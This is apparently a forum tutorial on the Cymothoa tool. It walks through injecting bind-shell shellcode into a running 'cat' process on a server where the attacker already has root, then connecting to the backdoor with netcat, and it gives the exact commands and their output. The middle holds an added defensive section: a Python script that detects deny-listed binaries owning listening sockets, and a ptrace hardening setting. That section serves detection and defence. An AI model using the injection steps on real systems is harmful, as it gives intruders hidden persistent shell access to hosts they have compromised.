Tutorial: Cymothoa Backdoor


Hello everyone! Today I want to talk about a backdoor tool that lets us create a backdoor on a server where we already have root, effectively giving us a way back into that server.

This backdoor tool is called Cymothoa and is already included in Kali Linux and BackTrack; those who don't have it can download it from here: https://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/


We start by listing all the processes running on the server to see what we could infect:


root@bt:~# ps -A | tail

4915 ? 00:00:00 krandrtray
4928 ? 00:00:00 knotify
4967 ? 00:00:01 konqueror
6674 ? 00:00:00 konsole
6675 pts/1 00:00:00 bash
6684 pts/1 00:00:00 cat
6685 ? 00:00:00 konsole
6686 pts/2 00:00:00 bash
6696 pts/2 00:00:00 ps
6697 pts/2 00:00:00 tail


To illustrate how the tool is used, we will attack a "cat" vector/process with pid 6684.

But first we can view and choose the specific parasite we want to use to attack/infect:


root@bt:~# ./cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - [email protected] [email protected]
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd


In this example we will use the second shellcode, the one that binds the parasite to our TCP connection. The attack looks like this:


root@bt:~# ./cymothoa -p 6684 -s 1 -y 5555

[+] attaching to process 6684

register info:

eax value: 0xfffffe00 ebx value: 0x0
esp value: 0xbfed7208 eip value: 0xffffe424

[+] new esp: 0xbfed7204
[+] injecting code into 0xb7f4d000
[+] copy general purpose registers
[+] detaching from 6684

[+] infected!!!


The tool tells us it has successfully infected the "cat" process we chose earlier. If we run the same command as at the start, we will see the second "cat":


root@bt:~# ps -A | tail

 6674 ? 00:00:00 konsole
 6675 pts/1 00:00:00 bash
 6684 pts/1 00:00:00 cat <-- original process
 6717 pts/1 00:00:00 cat <-- backdoor
 6718 pts/2 00:00:00 ps
 6719 pts/2 00:00:00 tail


The last thing we can do is connect to it using netcat:


root@bt:~# nc -vv localhost 5555

localhost [] 5555 (?) open
uname -a
Linux bt #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux


And we are connected to the backdoor we created!

Another example:
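The procedure above leaves two host-side artefacts a defender can correlate: a LISTEN entry in /proc/net/tcp owned by a binary that has no business accepting connections (here "cat"), and a second process with the same name and controlling tty as the victim, which is exactly what the post's second ps listing shows. The following detection script is an added example written for this page; it is not code from the post or from the Cymothoa project. It assumes that the forked copy (pid 6717) holds the listening socket, which the post's output suggests but does not prove, and it uses a hypothetical deny-list of binaries that should never listen; the /proc/net/tcp rows and process table are constructed to mirror the post's output.

```python
import re
from dataclasses import dataclass

# Hypothetical deny-list for this example: binaries that never legitimately own a
# listening TCP socket. A real deployment derives this from the host's role.
NEVER_LISTEN = {"cat", "tail", "ps", "bash", "sh", "konsole"}

TCP_LISTEN_STATE = "0A"                          # 'st' column value for LISTEN
SOCKET_LINK = re.compile(r"socket:\[(\d+)\]")    # readlink(/proc/<pid>/fd/N) form


@dataclass
class Proc:
    pid: int
    tty: str        # controlling tty as ps prints it ("pts/1" or "?")
    comm: str       # contents of /proc/<pid>/comm
    fds: list       # readlink targets of /proc/<pid>/fd/*


@dataclass
class Finding:
    pid: int
    comm: str
    port: int
    twins: list     # other pids with the same comm and tty (the forked copy)


def parse_listening_ports(proc_net_tcp: str) -> dict:
    """Map socket inode -> local port for every LISTEN row of /proc/net/tcp."""
    listeners = {}
    for line in proc_net_tcp.splitlines()[1:]:      # first line is the header
        cols = line.split()
        if len(cols) < 10 or cols[3] != TCP_LISTEN_STATE:
            continue
        port = int(cols[1].split(":")[1], 16)        # local_address is hexaddr:hexport
        listeners[int(cols[9])] = port               # inode column
    return listeners


def socket_inodes(proc: Proc) -> set:
    """Socket inodes a process holds open, taken from its fd link targets."""
    inodes = set()
    for target in proc.fds:
        m = SOCKET_LINK.fullmatch(target)
        if m:
            inodes.add(int(m.group(1)))
    return inodes


def find_backdoors(procs, proc_net_tcp: str) -> list:
    """Flag deny-listed binaries owning a listening TCP socket and report any
    same-name, same-tty sibling, the trace an injected fork leaves behind."""
    listeners = parse_listening_ports(proc_net_tcp)
    siblings = {}
    for p in procs:
        siblings.setdefault((p.comm, p.tty), []).append(p.pid)

    findings = []
    for p in procs:
        ports = sorted(listeners[i] for i in socket_inodes(p) if i in listeners)
        if ports and p.comm in NEVER_LISTEN:
            twins = [q for q in siblings[(p.comm, p.tty)] if q != p.pid]
            findings.append(Finding(p.pid, p.comm, ports[0], twins))
    return findings


# Constructed sample mirroring the post's second `ps -A | tail` listing: pid 6717 is
# the forked copy of the injected 'cat' (pid 6684) and holds the tcp/5555 listener.
PROC_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:15B3 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 41217 1 00000000 100 0 0 10 0\n"
    "   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 19042 1 00000000 100 0 0 10 0\n"
)

SAMPLE_PROCS = [
    Proc(4101, "?", "cupsd", ["socket:[19042]"]),                  # legitimate tcp/631 listener
    Proc(6674, "?", "konsole", ["socket:[18800]"]),                # unix socket, not in /proc/net/tcp
    Proc(6675, "pts/1", "bash", ["/dev/pts/1"]),
    Proc(6684, "pts/1", "cat", ["/dev/pts/1"]),                    # original process
    Proc(6717, "pts/1", "cat", ["/dev/pts/1", "socket:[41217]"]),  # backdoor
]

if __name__ == "__main__":
    for f in find_backdoors(SAMPLE_PROCS, PROC_NET_TCP):
        print(f"pid {f.pid} ({f.comm}) listens on tcp/{f.port}; "
              f"same-name siblings on its tty: {f.twins}")
```

On a live host the same two parsers run over the real /proc/net/tcp and the os.readlink results of /proc/<pid>/fd/*, so the check needs no extra tooling on the box. As a preventive control, the injection depends on ptrace attaching to a running process, and setting kernel.yama.ptrace_scope to 3 disables attaching entirely, even for root, until the next reboot.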


On 7/7/2018 at 5:01 PM, The-Angel said:

hi... question... does it only work for the root user? or for other users too?


Only with root, as far as I know. Of course you can try it on a plain admin account to see if it works and let us know here.
